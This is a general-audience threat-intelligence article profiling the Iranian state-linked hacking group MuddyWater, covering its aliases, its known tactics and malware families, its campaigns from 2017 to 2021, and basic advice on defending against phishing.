Throughout the years, there have been many advanced persistent threat (APT) groups, such as the Equation Group, Elfin, Turla and more, that have been able to attack organizations, go dark, then come back with new tricks up their sleeves. Another threat actor that has had multiple attacks starting as early as 2017 is the MuddyWater group.
This organization had notable attacks in 2017, 2018 and 2021 targeting a wide range of both government and private-sector organizations, including telecommunications, defense, local government, and oil and natural gas sectors. Their strikes have landed everywhere from Asia to Africa, Europe to North America, and MuddyWater is still active in the cyber threat landscape, having been observed as recently as this year.
The MuddyWater group
The MuddyWater group goes by many names, including Earth Vetala, MERCURY, Static Kitten, Seedworm and TEMP.Zagros. According to a CISA alert, it is a subordinate component within the Iranian Ministry of Intelligence and Security (MOIS) and has led cyber campaigns in support of MOIS objectives since around 2018. Through their attacks, these ATP actors provide stolen data and access to the Iranian government and other malicious cyber actors.
MuddyWater actors exploit publicly reported vulnerabilities and use open-source tools to gain access to private data on targets’ systems and deploy ransomware. They are known for their spearphishing campaigns that coax victims into downloading ZIP files that contain Excel files with malicious embedded links. These links then communicate with the actor’s C2 server or a PDF that drops a malicious file to the victim’s network.
They also stay on victim networks through side-loading dynamic link libraries (DLLs) that trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control (C2) functions. According to the same 2022 CISA alert, the FBI, CISA, CNMF and NCSC-UK have all observed MuddyWater recently using various malware — such as variants of PowGoop, Small Sieve, Canopy or Starwhale, Mori and POWERSTATS — for loading malware, backdoor access, persistence and exfiltration and other tools.
According to an Avertium article, due to the group using a variety of lures and targeting different geographic regions, MuddyWater is likely a conglomerate of subgroups that operate independently. Each group is motivated by espionage, intellectual theft, and destructive or disruptive operations.
To achieve these goals, MuddyWater supports the political dominance of Iran, and they are partly motivated by the nation-state’s interests, which helps determine their targets. For their intellectual property theft and to disrupt operations goals, MuddyWater has carried out aggressive campaigns and deployed ransomware, such as Thanos, which allows users to create their own custom-made malware for locking up victims’ files.
Since as early as 2017, MuddyWater started moving in on a wide range of targets, located across at least four continents. Cybersecurity experts noted in 2018 that MuddyWater was far from done after their first campaign. According to TrendMicro, “The attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries.” In fact, they have launched other attacks since then, and researchers can attribute those attacks to MuddyWater because of the similarities in attack style and targeted victims.
In 2017, the targets of these attacks were in India, Iraq, Israel, Pakistan, Saudi Arabia, Turkey, the United Arab Emirates and the U.S. The malicious documents attached to the emails tried to mimic those from government organizations, some containing government emblems, such as for the Ministry of Internal Affairs of the Republic of Tajikistan.
In 2018, MuddyWater’s targets were located in Turkey, Pakistan and Tajikistan. The documents again attempted to pass as if from government organizations, including the Iraqi National Intelligence Service, the National Security Agency and the Ministry of Interior of Saudi Arabia.
In 2021, they targeted Pakistan in April, Armenia in June and then Turkey in November. During these attacks, different methods were used, which shows how adaptable the group is. It also shows they are far from stopping their attacks anytime soon because they have yet to be caught and can develop different strategies in each campaign.
Understanding cyber threats
Because there are multiple groups that make up MuddyWater, each working independently, cybersecurity experts are still learning about their operations. They are still an active group, which means that the world likely hasn’t seen their last attack campaign. One takeaway from these previous attacks is that they use similar tactics. Staying educated about how cyber threats infiltrate networks can allow organizations to prepare and up their defenses.
Knowing to use extreme caution when receiving emails that may look government official can help protect against MuddyWater’s attack attempts. Training employees to distinguish malicious behavior, such as phishing links, and staying up to date with known vulnerabilities can only improve the likelihood of keeping an organization safe. The more often a group attacks, the more cybersecurity experts can learn about them and find their mistakes, which will eventually lead to the attackers being apprehended. Until then, though, maintaining strong cybersecurity practices is the best defense against any cyberattack.